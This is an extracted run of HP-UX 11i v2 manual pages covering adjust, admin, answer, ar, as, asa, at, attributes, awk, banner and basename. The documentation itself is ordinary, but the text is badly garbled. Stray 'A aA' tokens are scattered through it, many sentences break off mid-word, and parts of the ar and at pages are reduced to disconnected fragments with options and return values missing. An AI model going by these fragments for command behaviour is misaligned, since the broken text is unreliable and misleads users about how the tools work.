(adjust does not place two spaces after a pair of single closing quotes ( ’’ ) following a
terminal_character).
adjust starts a new output line whenever adding a word (other than the first one) to the current line
would exceed the right margin.
adjust understands indented first lines of paragraphs (such as this one) when filling. The
second and subsequent lines of each paragraph are indented the same amount as the second line of the
input paragraph if there is a second line, else the same as the first line.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−15
adjust(1) adjust(1)
* adjust also has a rudimentary understanding of tagged paragraphs (such as this one) when
filling. If the second line of a paragraph is indented more than the first, and the first line has
a word beginning at the same indentation as the second line, the input column position of the
tag word or words (prior to the one matching the second line indentation) is preserved.
Tag words are passed through without change of column position, even if they extend beyond the right
margin. The rest of the line is filled or right justified from the position of the first non-tag word.
When -j is given, adjust uses an intelligent algorithm to insert spaces in output lines where they are
most needed, until the lines extend to the right margin. First, all one space word separators are exam-
A aA ined. One space is added to each separator, starting with the one having the most letters between it and
the preceding and following separators, until the modified line reaches the right margin. If all one space
separators are increased to two spaces and more spaces must be inserted, the algorithm is repeated with
two space separators, and so on.
Output line indentation is held to one less than the right margin. If a single word is larger than the line
size (right margin minus indentation), that word appears on a line by itself, properly indented, and
extends beyond the right margin. However, if -r is used, such words are still right justified, if possible.
If the current locale defines class names ekinsoku and bkinsoku (see iswctype (3C)), adjust formats
the text in accordance with the ekinsoku/bkinsoku character classification and margin settings (see
-r, -j, and -m options).
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, adjusts for the processing of LC_MESSAGES.
DIAGNOSTICS
adjust complains to standard error and later returns a nonzero value if any input file cannot be opened
(it skips the file). It does the same (but quits immediately) if the argument to -m or -t is out of range, or
if the program is improperly invoked.
Input lines longer than BUFSIZ are silently split (before tab expansion) or truncated (afterwards). Lines
that are too wide to center begin in column 1 (no leading spaces).
EXAMPLES
This command is useful for filtering text while in vi (1). For example,
!}adjust
reformats the rest of the current paragraph (from the current line down), evening the lines.
The vi command:
:map ˆX {!}adjust -jˆVˆM
(where ˆ denotes control characters) sets up a useful ‘‘finger macro’’. Typing ˆX (Ctrl-X) reformats the
entire current paragraph.
adjust -m1 is a simple way to break text into separate words without white space, except for tagged-
paragraph tags.
Section 1−−16 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
adjust(1) adjust(1)
WARNINGS
This program is designed to be simple and fast. It does not recognize backslash to escape white space or
other characters. It does not recognize tagged paragraphs where the tag is on a line by itself. It knows
that lines end in newline or null, and how to deal with tabs and backspaces, but it does not do anything
special with other characters such as form feed (they are simply ignored). For complex operations, stan-
dard text processors are likely to be more appropriate.
This program could be implemented instead as a set of independent programs, fill, center, and justify
(with the -r option). However, this would be much less efficient in actual use, especially given the
program’s special knowledge of tagged paragraphs and last lines of paragraphs.
AUTHOR
A aA
adjust was developed by HP.
SEE ALSO
nroff(1).
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−17
admin(1) admin(1)
NAME
admin - create and administer SCCS files
SYNOPSIS
admin -i[name] [-n] [-b] [-a login ] ... [-d flag[flag-val ] ] ... [-f flag[flag-val ] ] ...
[-m mrlist ] ... [-r rel ] [-t[name] ] [-y[comment ] ] file ...
admin -n [-a login ] ... [-d flag[flag-val ] ] ... [-f flag[flag-val ] ] ... [-m mrlist ] ...
[-t[name] ] [-y[comment ] ] file ...
A aA admin [-a login ] ... [-e login ] ... [-d flag[flag-val ] ] ... [-m mrlist ] ...
[-r rel ] [-t[name] ] file ...
admin -h file ...
admin -z file ...
DESCRIPTION
The admin command is used to create new SCCS files and change the parameters of existing ones. Argu-
ments to admin, which may appear in any order, ( unless -- is specified as an argument, in which case
all arguments after -- are treated as files ) consist of option arguments, beginning with -, and named
file s (note that SCCS file names must begin with the characters s.). If a named file does not exist, it is
created and its parameters are initialized according to the specified option arguments. Parameters not
initialized by an option argument are assigned a default value. If a named file does exist, parameters
corresponding to specified option arguments are changed, and other parameters are left unaltered.
If directory is named instead of file , admin acts on each file in directory , except that non-SCCS files (the
last component of the path name does not begin with s.) and unreadable files are silently ignored. If a
name of - is given, the standard input is read, and each line of the standard input is assumed to be the
name of an SCCS file to be processed. Again, non-SCCS files and unreadable files are silently ignored.
The admin option arguments apply independently to all named file s, whether one file or many. In the
following discussion, each option is explained as if only one file is specified, although they affect single or
multiple files identically.
Options
The admin command supports the following options and command-line arguments:
-n This option indicates that a new SCCS file is to be created.
-i[name] The name of a file from which the contents for a new SCCS file is to be taken. (if
name is a binary file, then you must specify the -b option) The contents constitutes
the first delta of the file (see the -r option for the delta numbering scheme). If the
-i option is used but the file name is omitted, the text is obtained by reading the
standard input until an end-of-file is encountered. If this option is omitted, the
SCCS file is created with an empty initial delta. Only one SCCS file can be created
by an admin command on which the -i option is supplied. Using a single admin
to create two or more SCCS files requires that they be created empty (no -i option).
Note that the -i option implies the -n option.
-b Encode the contents of name, specified to the -i option. This keyletter must be used
if name is a binary file; otherwise, a binary file will not be handled properly by
SCCS commands.
-r rel The release (rel ) into which the initial delta is inserted. This option can be used
only if the -i option is also used. If the -r option is not used, the initial delta is
inserted into release 1. The level of the initial delta is always 1 (by default initial
deltas are named 1.1).
-t[name] The name of a file from which descriptive text for the SCCS file is to be taken. If
the -t option is used and admin is creating a new SCCS file (the -n and/or -i
options are also used), the descriptive text file name must also be supplied. In the
case of existing SCCS files:
• A -t option without a file name causes removal of descriptive text (if any)
currently in the SCCS file.
• A -t option with a file name causes text (if any) in the named file to
replace the descriptive text (if any) currently in the SCCS file.
Section 1−−18 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
admin(1) admin(1)
-f flag This option specifies a flag, and possibly a value for the flag, to be placed in the
SCCS file. Several -f options can be supplied on a single admin command line.
The allowable flags and their values are:
b Allows use of the -b option on a get command (see get (1)) to
create branch deltas.
cceil The highest release (i.e., "ceiling"), a number less than or equal to
9999, which can be retrieved by a get command for editing. The
default value for an unspecified c flag is 9999.
ffloor The lowest release (i.e., "floor"), a number greater than 0 but less
than 9999, which may be retrieved by a get command for editing.
A aA
The default value for an unspecified f flag is 1.
dSID The default delta number SID to be used by a get command (see
get (1)).
istr Causes the message:
No id keywords (cm7)
issued by get or delta to be treated as a fatal error (see delta (1)).
In the absence of this flag, the message is only a warning. The mes-
sage is issued if no SCCS identification keywords (see get (1)) are
found in the text retrieved or stored in the SCCS file. If a value is
supplied, the keywords must exactly match the given string. How-
ever, the string must contain a keyword, but must not contain
embedded newlines.
j Allows concurrent get commands for editing on the same SID of an
SCCS file. This allows multiple concurrent updates to the same
version of the SCCS file.
Only one user can perform concurrent edits. Access by multiple
users is usually accomplished by using a common login or a set user
ID program (see chmod(1) and exec (2)).
llist A list of releases to which deltas can no longer be made. (A get
-e against one of these locked releases fails). The list has the fol-
lowing syntax:
list ::= range | list , range
range ::= RELEASE NUMBER | a
The character a in the list is equivalent to specifying all releases
for the named SCCS file. Omitting any list is equivalent to a.
n Causes delta to create a null delta in each of those releases being
skipped (if any) when a delta is made in a new release (such as
when making delta 5.1 after delta 2.7, release 3 and release 4 are
skipped). These null deltas serve as anchor points so that branch
deltas can be created from them later. The absence of this flag
causes skipped releases to be nonexistent in the SCCS file, prevent-
ing branch deltas from being created from them in the future.
qtext User-definable text substituted for all occurrences of the %Q% key-
word in SCCS file text retrieved by get.
mmod The module name of the SCCS file substituted for all occurrences of
the %M% keyword in SCCS file text retrieved by get. If the m flag is
not specified, the value assigned is the name of the SCCS file with
the leading s. removed.
ttype The type of module in the SCCS file substituted for all occurrences
of %Y% keyword in SCCS file text retrieved by get.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−19
admin(1) admin(1)
A aA be supplied on a single admin command line. See the -f option for allowable flag
names.
llist A list of releases to be unlocked. See the -f option for a descrip-
tion of the l flag and the syntax of a list .
-a login A login name, or numerical HP-UX group ID, to be added to the list of users
allowed to make deltas (changes) to the SCCS file. A group ID is equivalent to
specifying all login names common to that group ID. Several a options can be used
on a single admin command line. As many login s or numerical group IDs as
desired can be on the list simultaneously. If the list of users is empty, anyone can
add deltas. A login or group ID preceded by a ! denies permission to make deltas.
-e login A login name or numerical group ID to be erased from the list of users allowed to
make deltas (changes) to the SCCS file. Specifying a group ID is equivalent to
specifying all login names common to that group ID. Several e options can be used
on a single admin command line.
-y[comment] The comment text is inserted into the SCCS file as a comment for the initial delta in
a manner identical to that of delta (1). Omission of the -y option results in a
default comment line being inserted in the form:
date and time created YY / MM / DD / HH / MM / SS by login
The -y option is valid only if the -i and/or -n options are specified (i.e., a new
SCCS file is being created).
-m mrlist The list of Modification Request (MR) numbers is inserted into the SCCS file as the
reason for creating the initial delta, in a manner identical to delta (1). The v flag
must be set and the (MR) numbers are validated if the v flag has a value (the name
of an (MR) number validation program). Diagnostic messages occur if the v flag is
not set or (MR) validation fails.
-h Causes admin to check the structure of the SCCS file (see sccsfile (4)), and to com-
pare a newly computed checksum (the sum of all of the characters in the SCCS file
except those in the first line) with the checksum that is stored in the first line of the
SCCS file. Appropriate error diagnostics are produced.
This option inhibits writing on the file, thus canceling the effect of any other options
supplied, and therefore is only meaningful when processing existing files.
-z The SCCS file checksum is recomputed and stored in the first line of the SCCS file
(see -h, above).
Note that use of this option on a truly corrupted file can prevent future detection of
the corruption.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text as single- and/or multi-byte characters.
LC_MESSAGES determines the language in which messages are displayed.
Section 1−−20 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
admin(1) admin(1), admin behaves as if all internationalization variables are set to C.
See environ (5).
DIAGNOSTICS
Use sccshelp (1) for explanations. A aA
WARNINGS
SCCS files can be any length, but the number of lines in the text file itself cannot exceed 99 999 lines.
FILES
The last component of all SCCS file names must be of the form s.filename. New SCCS files are given
mode 444 (see chmod(1)). Write permission in the pertinent directory is required to create a file. All
writing done by admin is to a temporary x-file, called x.filename, (see get (1)), created with mode 444 if
the admin command is creating a new SCCS file, or with the same mode as the SCCS file if it exists.
After successful execution of admin, the SCCS file is removed (if it exists), and the x-file is renamed to
the name of the SCCS file. This ensures that changes are made to the SCCS file only if no errors
occurred.
It is recommended that directories containing SCCS files be mode 755 and that SCCS files themselves be
mode 444. The mode of any given directory allows only the owner to modify SCCS files contained in that
directory. The mode of the SCCS files prevents any modification at all except by SCCS commands.
If it should be necessary to patch an SCCS file for any reason, the mode can be changed to 644 by the
owner, thus allowing the use of vi or any other suitable editor. Care must be taken! The edited file
should always be processed by an admin -h to check for corruption followed by an admin -z to gen-
erate a proper checksum. Another admin -h is recommended to ensure the SCCS file is valid.
admin also makes use of a transient lock file called z.filename), which is used to prevent simultaneous
updates to the SCCS file by different users. See get (1) for further information.
SEE ALSO
delta(1), ed(1), get(1), sccshelp(1), prs(1), what(1), sccsfile(4), acl(5).
STANDARDS CONFORMANCE
admin: SVID2, SVID3, XPG2, XPG3, XPG4
HP-UX 11i Version 2: August 2003 −4− Hewlett-Packard Company Section 1−−21
answer(1) answer(1)
NAME
answer - phone message transcription system
SYNOPSIS
answer [-pu]
DESCRIPTION
The answer interactive program helps you to transcribe telephone (and other) messages into electronic
mail.
A aA The program uses your personal elm alias database and the system elm alias database, allowing you to
use aliases to address the messages.
Options
answer supports the following options:
-p Prompt for phone-slip-type message fields.
-u Allow addresses that are not aliases.
Operation
answer begins with the Message to: prompt. Enter a one-word alias or a two-word user name
("Words" are separated by spaces.) The user name is converted to an alias in the form f _lastword, where
f is the first character of the first word, lastword is the second word, and all letters are shifted to lower-
case. For example, Dave Smith is converted to the alias d_smith.
Without the -u option, the specified or converted alias must exist in the alias databases. With the -u
option, if the processed "alias" is not in the alias databases, it is used for the address as is.
The fully expanded address is displayed.
With the -p option, you are asked for typical message slip data:
Caller:
of:
Phone:
TELEPHONED -
CALLED TO SEE YOU -
WANTS TO SEE YOU -
RETURNED YOUR CALL -
PLEASE CALL -
WILL CALL AGAIN -
*****URGENT****** -
Enter the appropriate data. You can put just an X or nothing after the pertinent dash prompts, or you
can type longer comments. Whatever you enter becomes part of the message. Lines with no added text
are omitted from the message.
Finally, you are prompted for a message. Enter a message, if any, ending with a blank line. The mes-
sage is sent and the Message to: prompt is repeated.
To end the program, enter any one of bye, done, exit, or quit, at the Message to: prompt.
EXAMPLES
User input is in normal type.
With No Options
This example shows a valid alias, an invalid user name, and a valid user name. In the invalid case, the
converted alias is displayed in square brackets.
-----------------------------------------------------------------
Section 1−−22 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
answer(1) answer(1)
-----------------------------------------------------------------
-----------------------------------------------------------------
TELEPHONED - at 4:30pm
CALLED TO SEE YOU -
WANTS TO SEE YOU - X
RETURNED YOUR CALL -
PLEASE CALL - X
WILL CALL AGAIN -
*****URGENT****** - very very!
FILES
$HOME/.elm/aliases User alias database data table
$HOME/.elm/aliases.dir User alias database directory table
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−23
answer(1) answer(1)
AUTHOR
SEE ALSO
elm(1), newalias(1).
Section 1−−24 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
ar(1) ar(1)
NAME
ar - create and maintain portable archives and libraries
SYNOPSIS
ar [-]key [-][modifier ...] [posname ] afile [name ...]
DESCRIPTION. A aA:
• If the u modifier is used with the operation character r, only those files with modification
dates later than those of the corresponding member files are replaced.
•.
• ar creates afile if it does not already exist.
• If no name is specified and:
• the specified archive file does not exist, ar creates an empty archive file containing only
the archive header (see ar (4)).
• the archive contains one or more files whose names match names in the current direc-
tory, each matching archive file is replaced by the corresponding local file without con-
sidering con-
tents of all files are printed in the order that they appear in the archive.
m Move the named files. By default, the files are moved to the end of the archive. If a position-
ing.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−25
ar(1) ar(1)
x Extract the named files. If no names are given, all files in the archive are extracted. In nei-
ther case does x alter entries from the archive file.
The following list describes the optional modifier characters:
a Position the files after the existing positioning file specified by posname .
b Place the new files before the existing positioning file specified by posname .
c Suppress the message normally produced when afile is created. For r and q operations, ar
normally creates afile if it does not already exist.
A aA use-
ful only to avoid long build times when creating a large archive piece-by-piece. If an existing
archive contains a symbol table, the z modifier will cause it to be invalidated. If a file name warn-
ing pro-
vided
Section 1−−26 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
ar(1) ar(1)
q: v, f, F, l, c, A, z, s
t: v, f, F, s
p: v, f, F, s
x: v, f, F, s, C, T
EXTERNAL INFLUENCES
Environment Variables
The following internationalization variables affect the execution of ar:
LANG
Determines the locale category for native language, local customs and coded character set in the
absence of LC_ALL and other LC_* environment variables. If LANG is not specified or is set to the
A aA, ar behaves as if all internationalization
variables are set to C. See environ (5).
In addition, the following environment variable affects ar:
TMPDIR
Specifies a directory for temporary files (see tmpnam (3S)). The l modifier overrides the TMPDIR
variable, and TMPDIR overrides /var/tmp, the default directory.
DIAGNOSTICS
Create a new file (if one does not already exist) in archive format with its constituents entered in the
order indicated:
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−27
ar(1) ar(1)
WARNINGS.
FILES
/var/tmp/ar* Temporary files
SEE
STANDARDS CONFORMANCE
ar: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
Section 1−−28 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
as(1) as(1)
(Itanium(R)-based System Only)
NAME
as - assembler (Itanium Processor Family)
SYNOPSIS
as [ option ...] [ file ]
DESCRIPTION
as assembles the named source file file , or the standard input if file is not specified. The output of the
assembler is an ELF relocatable object file that must be processed by ld before it can be executed.
Assembler output is stored in file outfile . If the -o outfile option is not specified, the assembler constructs
a default name. If no source file is specified, outfile will be a.out; otherwise the .s suffix (if present) is
A aA
stripped from the name of the source file and .o is appended to it. Any directory names are removed
from the name so that the object file is always written to the current directory.
as does not not perform any macro processing. Standard C preprocessor constructs can be used if the
assembler is invoked through the C compiler.
Options
as recognizes the following options.
+A32 Specify that the source file contains 32-bit ABI targeted code. This option is overridden by
the .psr abi64 assembler directive in the source file. The object file is a 32-bit ELF file
by default.
+A64 Specify that the source file contains 64-bit ABI targeted code. This option is overridden by
the .psr abi32 assembler directive in the source file. The object file is a 64-bit ELF file
by default.
+E32 Specify that the object file should be 32-bit ELF. This is the default (see also +A32). Note
that it is valid to write 64-bit ABI targeted code to a 32-bit ELF file. All 32-bit addresses in
the object file are zero-extended to 64-bit upon loading. Zero-extension, however, may
invalidate any negative addresses (such as with relocations).
-elf32 See +E32.
+E64 Specify that the object file should be 64-bit ELF (see also +A64).
-elf64 See +E64.
-o outfile Produce an output object file with the name outfile instead of constructing a default name.
EXTERNAL INFLUENCES
Environment Variables
NLSPATH determines the location of the message catalog for the processing of LC_MESSAGES.
SDKROOT controls which assembler to invoke and enables support for multiple (cross-) development kits.
The SDKROOT variable points to the root of a specific SDK. No provision has been made to validate the
value of the variable or the suitability of the assembler that’s being invoked.
WARNINGS
The assembler does not check dependencies.
DIAGNOSTICS
When syntactic or semantic errors occur, a single-line diagnostic is displayed on standard error, together
with the line number and the file name in which it occurred.
FILES
/usr/lib/nls/C/as.cat assembler error message catalog
a.out default assembler output file
SEE ALSO
cc(1), elf(3E), ld(1).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−29
asa(1) asa(1)
NAME
asa - interpret ASA carriage control characters
SYNOPSIS
asa [files ]
DESCRIPTION
asa interprets the output of FORTRAN programs that utilize ASA carriage control characters. It
processes either the files whose names are given as arguments, or the standard input if - is specified or if
A aA no file names are given. The first character of each line is assumed to be a control character. The follow-
ing control characters are interpreted as indicated:
(blank) Output a single new-line character before printing.
(space) (XPG4 only.) The rest of the line will be output without change.
0 A <newline> shall be output, then the rest of the input line.
1 Output a new-page character before printing.
+ Overprint previous line.
+ (XPG4 only.) The <newline> of the previous line shall be replaced with one or more
implementation-defined characters that causes printing to return to column position 1, fol-
lowed by the rest of the input line. If the + is the first character in the input, it shall have
the same effect as <space>.
Lines beginning with other than the above characters are treated the same as lines beginning with a
blank. The first character of a line is not printed. If any such lines appear, an appropriate diagnostic is
sent to standard error. This program forces the first line of each input file to start on a new page.
(XPG4 only.) The action of the asa utility is unspecified upon encountering any character other than those
listed above as the first character in a line.
To view the output of FORTRAN programs which use ASA carriage control characters and have them
appear in normal form, asa can be used as a filter:
a.out | asa | lp
The output, properly formatted and paginated, is then directed to the line printer. FORTRAN output
previously sent to a file can be viewed on a user terminal screen by using:
asa file, asa behaves as if all internationalization
variables are set to "C". See environ (5).
SEE ALSO
efl(1), f77(1), fsplit(1), ratfor(1).
STANDARDS CONFORMANCE
asa: XPG4, POSIX.2
Section 1−−30 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
A aA
Enter commands from a file to run at a specified time:
at -f job-file [-m] [-q queue ] -t spectime
at -f job-file [-m] [-q queue ] time [date ] [next timeunit +count timeunit ]:
• From the keyboard on separate lines immediately after the at or batch command line, followed by
the currently defined eof (end-of-file) character to end the input. The default eof is Ctrl-D. It can be
redefined in your environment (see stty (1)).
• With the -f option of the at command to read input from a script file.
• From output piped from a preceding command.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−31
at(1) at(1)
Section 1−−32 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
at(1) at(1)
EXTERNAL INFLUENCES
Environment Variables
LC_TIME determines the format and contents of date and time strings.
LC_MESSAGES determines the language in which messages are displayed.
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−33
at(1) at(1)
LC_MESSAGES also determines the language in which the words days, hours, midnight, minutes,
months, next, noon, now, today, tomorrow, weeks, years, and their singular forms can also be
specified.
IF LC_TIME, all internationalization variables default
to "C" (see environ (5)).
RETURN VALUE
The exit code is set to one of the following: mes-
sage stan-
dard:
Section 1−−34 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
at(1) at(1) A aA trail-
ing operator is silently ignored.
If you use both -t and time ... in the same command, the first specified is accepted and the second is
silently ignored.
If the FIFO used to communicate with cron fills up, at is suspended until cron has read sufficient mes-
sages
HP-UX 11i Version 2: August 2003 −5− Hewlett-Packard Company Section 1−−35
attributes(1) attributes(1)
NAME
attributes - describe an audio file
SYNOPSIS
/opt/audio/bin/attributes filename
DESCRIPTION
This command provides information about an audio file, including file format, data format, sampling rate,
number of channels, data length and header length.
A aA EXAMPLE
The following is an example of using attributes on an audio file supplied with HP-UX.
$ /opt/audio/bin/attributes /opt/audio/sounds/welcome.au
File Name: /opt/audio/sounds/welcome.au
File Type: NeXT/Sun
Data Format: Mu-law
Sampling Rate: 22050
Channels: Mono
Duration: 1.972 seconds
Bits per Sample: 8
Header Length: 40 bytes
Data Length: 43492 bytes
AUTHOR
attributes was developed by HP.
Sun is a trademark of Sun MicroSystems, Inc.
NeXT is a trademark of NeXT Computers, Inc.
SEE ALSO
audio(5), asecure(1M), aserver(1M), convert(1), send_sound(1).
Using the Audio Developer’s Kit
Section 1−−36 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
awk(1) awk(1)
NAME
awk - pattern-directed scanning and processing language
SYNOPSIS
awk [-Ffs ] [-v var =value ] [ program -f progfile ... ] [ file ... ]
DESCRIPTION
awk scans each input file for lines that match any of a set of patterns specified literally in program or in
one or more files specified as -f progfile . With each pattern there can be an associated action that is to
be performed when a line in a file matches the pattern. Each line is matched against the pattern portion
of every pattern-action statement, and the associated action is performed for each matched pattern. The A aA
file name - means the standard input. Any file of the form var =value is treated as an assignment, not a
filename. An assignment is evaluated at the time it would have been opened if it were a filename, unless
the -v option is used.
An input line is made up of fields separated by white space, or by regular expression FS. The fields are
denoted $1, $2, ...; $0 refers to the entire line.
Options
awk recognizes the following options and arguments:
-F fs Specify regular expression used to separate fields. The default is to recognize space
and tab characters, and to discard leading spaces and tabs. If the -F option is
used, leading input field separators are no longer discarded.
-f progfile Specify an awk program file. Up to 100 program files can be specified. The
pattern-action statements in these files are executed in the same order as the files
were specified.
-v var =value Cause var =value assignment to occur before the BEGIN action (if it exists) is exe-
cuted.
Statements
A pattern-action statement has the form:
pattern { action }
A missing { action } means print the line; a missing pattern always matches. Pattern-action statements
are separated by new-lines or semicolons..
delete array [ expression ] # delete an array element.
exit [ expression ] # exit immediately; status is expression.
Statements are terminated by semicolons, newlines or right braces. An empty expression-list stands for
$0. String constants are quoted (" "), with the usual C escapes recognized within. Expressions take on
string or numeric values as appropriate, and are built using the operators +, -, *, /, %, ˆ (exponentia-
tion), and concatenation (indicated by a blank). The operators ++, - -, +=, -=, *=, /=, %=, ˆ=, **=, >,
>=, <, <=, ==, !=, "" (double quotes, string conversion operator), and ?: are also available in expres-
sions. Variables can be scalars, array elements (denoted x [i ]) or fields. Variables are initialized to the
null string. Array subscripts can be any string, not necessarily numeric (this allows for a form of associa-
tive memory). Multiple subscripts such as [ i ,j ,k ] are permitted. The constituents are concatenated,
separated by the value of SUBSEP.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−37
awk(1) awk(1)
The print statement prints its arguments on the standard output (or on a file if >file or >>file is
present or on a pipe if |cmd is present), separated by the current output field separator, and terminated
by the output record separator. file and cmd can be literal names or parenthesized expressions. Identical
string values in different statements denote the same open file. The printf statement formats its
expression list according to the format (see printf (3)).
Built-In Functions
The built-in function close(expr ) closes the file or pipe expr opened by a print or printf state-
ment or a call to getline with the same string-valued expr . This function returns zero if successful,
Patterns
Patterns are arbitrary Boolean combinations (with ! || &&) of regular expressions and relational
expressions. awk supports Extended Regular Expressions as described in regexp (5). Isolated regular
expressions in a pattern apply to the entire line. Regular expressions can also occur in relational expres-
sions, using the operators ˜ and !˜. /re / is a constant regular expression; any string (constant or vari-
able) can be used as a regular expression, except in the position of an isolated regular expression in a pat-
tern.
Section 1−−38 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
awk(1) awk(1)
A pattern can ˜ (matches) or !˜ (does
not match). A conditional is an arithmetic expression, a relational expression, or a Boolean combination
of the two.
A aA
The special patterns BEGIN and END can be used to capture control before the first input line is read
and after the last. BEGIN and END do not combine with other patterns.
Special Characters
The following special escape sequences are recognized by awk in both regular expressions and strings:
Escape Meaning
\a alert character
\b backspace character
\f form-feed character
\n new-line character
\r carriage-return character
\t tab character
\v vertical-tab character
\nnn 1- to 3-digit octal value nnn
\xhhh 1- to n-digit hexadecimal number
Variable Names
Variable names with special meanings are:
FS Input field separator regular expression; a space character by default; also sett-
able by option -Ffs.
NF The number of fields in the current record.
NR The ordinal number of the current record from the start of input. Inside a
BEGIN action the value is zero. Inside an END action the value is the number of
the last record processed.
FNR The ordinal number of the current record in the current file. Inside a BEGIN
action the value is zero. Inside an END action the value is the number of the last
record processed in the last file processed.
FILENAME A pathname of the current input file.
RS The input record separator; a newline character by default.
OFS The print statement output field separator; a space character by default.
ORS The print statement output record separator; a newline character by default.
OFMT Output format for numbers (default %.6g). If the value of OFMT is not a
floating-point format specification, the results are unspecified.
CONVFMT Internal conversion format for numbers (default %.6g). If the value of
CONVFMT is not a floating-point format specification, the results are unspecified.
Refer to the UNIX95 variable under EXTERNAL INFLUENCES for additional
information on CONVFMT.
SUBSEP The subscript separator string for multi-dimensional arrays; the default value is
"\034"
ARGC The number of elements in the ARGV array.
ARGV An array of command line arguments, excluding options and the program argu-
ment numbered from zero to ARGC-1.
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−39
awk(1) awk(1)
The arguments in ARGV can be modified or added to; ARGC can be altered. As
each input file ends, awk will treat the next non-null element of ARGV, up to the
current value of ARGC-1, inclusive, as the name of the next input file. Thus, set-
ting an element of ARGV to null means that it will not be treated as an input file.
The name - indicates the standard input. If an argument matches the format of
an assignment operand, this argument will be treated as an assignment rather
than a file argument.
ENVIRON Array of environment variables; subscripts are names. For example, if environ-
ment variable V=thing, ENVIRON["V"] produces thing.
A aA RSTART The starting position of the string matched by the match function, numbering
from 1. This is always equivalent to the return value of the match function.
RLENGTH The length of the string matched by the match function.
Functions can be defined (at the position of a pattern-action statement) as follows:
function foo(a, b, c) { ...; return x }
Parameters are passed by value if scalar, and by reference if array name. Functions can be called recur-
sively. Parameters are local to the function; all other variables are global.
Note that if pattern-action statements are used in an HP-UX command line as an argument to the awk
command, the pattern-action statement must be enclosed in single quotes to protect it from the shell. For
example, to print lines longer than 72 characters, the pattern-action statement as used in a script (-f
progfile command form) is:
length > 72
The same pattern action statement used as an argument to the awk command is quoted in this manner:
awk ’length > 72’
EXTERNAL INFLUENCES
Environment Variables
UNIX95 If defined, specifies to use the XPG4 behavior for this command. The changes for XPG4
include support for the entire behaviour specified above and include the following
behavioral change:
• If CONVFMT is not specified and UNIX95 is set, %d is used as the internal conversion
format for numbers by default.
LANG Provides a default value for the internationalization variables that are unset or null. If
LANG is unset or null, the default value of "C" (see lang (5)) is used. If any of the interna-
tionalization variables contains an invalid setting, awk will behave as if all internation-
alization variables are set to "C". See environ (5).
LC_ALL If set to a non-empty string value, overrides the values of all the other internationaliza-
tion variables.
LC_CTYPE Determines the interpretation of text as single and/or multi-byte characters, the
classification of characters as printable, and the characters matched by character class
expressions in regular expressions.
LC_NUMERIC Determines the radix character used when interpreting numeric input, performing
conversion between numeric and string values and formatting numeric output. Regard-
less of locale, the period character (the decimal-point character of the POSIX locale) is
the decimal-point character recognized in processing awk programs (including assign-
ments in command-line arguments).
LC_COLLATE Determines the locale for the behavior of ranges, equivalence classes and multi-character
collating elements within.
PATH Determines the search path when looking for commands executed by system(cmd), or
input and output pipes.
Section 1−−40 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
awk(1) awk(1)
In addition, all environment variables will be visible via the awk variable ENVIRON.
DIAGNOSTICS
awk supports up to 199 fields ($1, $2, ..., $199) per record.
EXAMPLES
Print lines longer than 72 characters: A aA command (see echo (1)):
BEGIN { # Simulate echo(1)
for (i = 1; i < ARGC; i++) printf "%s ", ARGV[i]
printf "\n"
exit }
AUTHOR
awk was developed by AT&T, IBM, OSF, and HP.
SEE ALSO
lex(1), sed(1).
A. V. Aho, B. W. Kernighan, P. J. Weinberger: The AWK Programming Language , Addison-Wesley, 1988.
STANDARDS CONFORMANCE
awk: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
HP-UX 11i Version 2: August 2003 −5− Hewlett-Packard Company Section 1−−41
banner(1) banner(1)
NAME
banner - make posters in large letters
SYNOPSIS
banner strings
DESCRIPTION
banner prints its arguments (each up to 10 characters long) in large letters on the standard output.
Each argument is printed on a separate line. Note that multiple-word arguments must be enclosed in
quotes in order to be printed on the same line.
A bA EXAMPLES
Print the message ‘‘Good luck Susan’’ in large letters on the screen:
banner "Good luck" Susan
The words Good luck are displayed on one line, and Susan is displayed on a second line.
WARNINGS
This command is likely to be withdrawn from X/Open standards. Applications using this command might
not be portable to other vendors’ platforms.
SEE ALSO
echo(1).
STANDARDS CONFORMANCE
banner: SVID2, SVID3, XPG2, XPG3
Section 1−−42 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
basename(1) basename(1)
NAME
basename, dirname - extract portions of path names
SYNOPSIS
basename string [ suffix ]
dirname [ string ]
DESCRIPTION
basename deletes any prefix ending in / and the suffix (if present in string ) from string , and prints the
result on the standard output. If string consists entirely of slash characters, string is set to a single slash
character. If there are any trailing slash characters in string , they are removed. If the suffix operand is
present but not identical to the characters remaining in string , but it is identical to a suffix of the charac- A bA
ters remaining in string , the suffix is removed from string . basename is normally used inside com-
mand substitution marks ( `... ` ) within shell procedures.
dirname delivers all but the last level of the path name in string . If string does not contain a directory
component, dirname returns ., indicating the current working directory.
EXTERNAL INFLUENCES
Environment Variables
